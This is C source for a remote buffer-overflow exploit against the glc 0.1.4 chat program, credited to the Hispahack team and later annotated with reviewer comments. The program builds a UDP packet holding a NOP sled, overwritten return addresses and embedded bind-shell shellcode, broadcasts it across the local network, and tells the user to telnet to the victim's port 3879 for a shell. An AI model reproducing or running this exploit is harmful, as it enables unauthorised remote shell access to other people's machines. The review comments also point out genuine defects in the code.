/*
 * !Hispahack Research Team 
 * http://hispahack.ccc.de
 *
 * THIS IS !HISPAHACK UNPUBLISHED CODE
 *
 * Linux remote Xploit for glc 0.1.4 at add_usr()
 * 
 * We have to overwrite these parameters before eip
 *
 *       int new_user = 0; 
 *       gchar info[100];
 *
 * Since we don't have enough space to put our shellcode 
 * before eip we will put it after :)
 *
 *  AAAAAAA.108A..AAAA-RTRTRTRTRT-SHELLCODE
 *                       |-----------^
 *
 * By: Zhodiac <zhodiac@softhome.net>
 *
 * This code is dedicated to the real and only 
 * inspiration i have, my love [CrAsH]] :**
 *
 * #include <standard/disclaimer.h>
 *
 * Madrid, 25/09/2000
 *
 * Spain r0x 
 *
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <netdb.h>

#define NUMADDR 8
#define NUMNOPS 120
#define BUFFSIZE 400
#define NOP 0x90
#define OFFSET 0xbffffa34

#define LC_JOIN 107
#define INPORT 16128

/* This shellcode binds a shell at port 3879 thx www.hack.co.za */
/*
 * Raw machine code kept as a C string. It contains no 0x00 byte, which is
 * what lets makebuffer() measure it with strlen() (129 bytes by count,
 * including the trailing "/bin/sh"). Nothing in this file documents the
 * payload's internals beyond the comment above; it is copied verbatim into
 * the packet and never modified.
 */
char shellcode[]=
 "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
 "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
 "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
 "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
 "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
 "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
 "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
 "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

/*
 * The packet as this program lays it out in memory. sendstuff() transmits
 * sizeof(struct cab) raw bytes, so compiler padding, host byte order and
 * the size of `unsigned long` are all part of the wire format (no htonl()
 * is applied to the integer fields anywhere in this file).
 *
 * Field meanings are inferred from the names; only type, sender and nick
 * are assigned by makebuffer(). Everything else is whatever the caller's
 * buffer already held (see the note on makebuffer()).
 */
struct cab {
  char cHead[4];           /* 4-byte header; not assigned by this program */
  unsigned char type;      /* message type; makebuffer() stores LC_JOIN */
  unsigned int sender;     /* sender id; makebuffer() stores 3 */
  unsigned int dest;       /* destination id; not assigned here */
  char nick[BUFFSIZE];     /* 400 bytes; makebuffer() builds its payload in here */
  unsigned char nR;        /* presumably nick colour R/G/B — not assigned here */
  unsigned char nG;
  unsigned char nB;
  unsigned char xVal;      /* meaning not documented in this file */
  unsigned char cCrypt;    /* meaning not documented in this file */
  unsigned char Female;    /* meaning not documented in this file */
  unsigned long Reserved1; /* 4 bytes on ILP32, 8 on LP64: layout is ABI-dependent */
  unsigned long Reserved2;
  unsigned long Reserved3;
  char data[4096];         /* message body; not assigned here */
};

/*
 * Write the program banner to stdout.
 *
 * Takes no arguments and returns nothing; the two strings contain no
 * conversion specifiers, so they are emitted verbatim.
 */
void printbanners(void) {
 fputs("\nLinux Xploit for glc 0.1.4 by Zhodiac <zhodiac@softhome.net>\n", stdout);
 fputs("THIS IS !HISPAHACK UNPUBLISHED CODE\nhttp://hispahack.ccc.de\n\n", stdout);
}

/*
 * Broadcast the packet in `buffer` as one UDP datagram to port INPORT on
 * 255.255.255.255.
 *
 * buffer: caller-owned; exactly sizeof(struct cab) bytes are read from it,
 *         so it must be at least that large.
 *
 * On a sendto() failure an error line goes to stderr and the process exits
 * with status -1. On success a confirmation line is printed to stdout.
 *
 * NOTE(review): the socket() and setsockopt() results are not checked; if
 * socket() fails the later sendto() fails (EBADF) and the process exits
 * through the same path, but the message will not say why. SO_BROADCAST is
 * required for the limited-broadcast destination used here. memset(),
 * exit() and close() are called without <string.h>, <stdlib.h> and
 * <unistd.h> being included in this file (implicit declarations).
 */
void sendstuff(char *buffer) {
 int enable = 1;
 struct sockaddr_in dst;
 int sock = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP);

 setsockopt(sock, SOL_SOCKET, SO_BROADCAST, &enable, sizeof(int));

 memset(&dst, 0, sizeof dst);
 dst.sin_family = AF_INET;
 dst.sin_port = htons(INPORT);
 dst.sin_addr.s_addr = INADDR_BROADCAST;

 if (sendto(sock, buffer, sizeof(struct cab), 0,
            (struct sockaddr *)&dst, sizeof dst) < 0) {
     fprintf(stderr, "Error Sending datagram message");
     exit(-1);
 }

 printf("Successfully sent udp datagram to broadcast (255.255.255.255)\n");

 close(sock);
}

/*
 * Build the LC_JOIN packet sketched in the file header inside `buffer`:
 * 100 filler bytes, NUMADDR copies of OFFSET, NUMNOPS NOP bytes, then the
 * shellcode, all written into the struct cab nick[] field.
 *
 * buffer: caller-owned; must hold at least sizeof(struct cab) bytes
 *         (`cabecera` is Spanish for "header").
 *
 * NOTE(review): `sizeof(buffer)` is sizeof(char *) here, not the size of
 * the caller's array, so only the first pointer-size bytes are zeroed.
 * Whatever main()'s uninitialised stack array contained in the remaining
 * fields is transmitted as-is by sendstuff().
 * NOTE(review): the layout assumes sizeof(unsigned long) == 4 (32-bit
 * Linux). By count, 100 + NUMADDR*4 + NUMNOPS + strlen(shellcode) is
 * 381 bytes and fits in nick[BUFFSIZE]; on an LP64 build each OFFSET slot
 * is 8 bytes and the final memcpy() runs past nick[] into the following
 * fields.
 */
void makebuffer(char *buffer) {
int aux;
struct cab *cabecera;
char *char_ptr;
unsigned long *long_ptr;

 memset(buffer,0,sizeof(buffer));  /* sizeof a pointer, not the array — see NOTE above */
 cabecera=(struct cab*)buffer;
 cabecera->type=LC_JOIN;            /* message type 107 */
 cabecera->sender=3;                /* sender id; the value 3 is not explained in this file */
 memset(cabecera->nick,'A',100);    /* 100 filler bytes at the start of nick[] */
 long_ptr=(unsigned long*)(cabecera->nick+100);
 for (aux=0;aux<NUMADDR;aux++) *(long_ptr++)=OFFSET;  /* NUMADDR copies of OFFSET, host byte order */
 char_ptr=(char*)long_ptr;
 memset(char_ptr,NOP,NUMNOPS);      /* NUMNOPS bytes of NOP */
 char_ptr+=NUMNOPS;
 memcpy(char_ptr,shellcode,strlen(shellcode));  /* shellcode has no NUL byte, so strlen() covers all of it */

 }

/*
 * Entry point: print the banner, build the packet in a local array,
 * broadcast it, then tell the user what to check next.
 *
 * argc/argv are accepted but never used. `void main` is not a conforming
 * signature (C11 5.1.2.2.1 expects int), so the status returned to the
 * host on normal completion is unspecified; the only defined exit status
 * is the -1 that sendstuff() passes to exit() on a send failure.
 *
 * NOTE(review): `packet` is not initialised here and makebuffer() only
 * zeroes a few leading bytes of it; the rest of the sizeof(struct cab)
 * bytes that sendstuff() transmits are stack contents. 8096 is larger than
 * sizeof(struct cab) on the usual ABIs, so the array itself is not
 * overrun.
 */
void main(int argc, char **argv) {
 char packet[8096];

 (void)argc;
 (void)argv;

 printbanners();
 makebuffer(packet);
 sendstuff(packet);

 printf("Now telnet to the victim port 3879 to see if it succeeded :))\n\n");
}

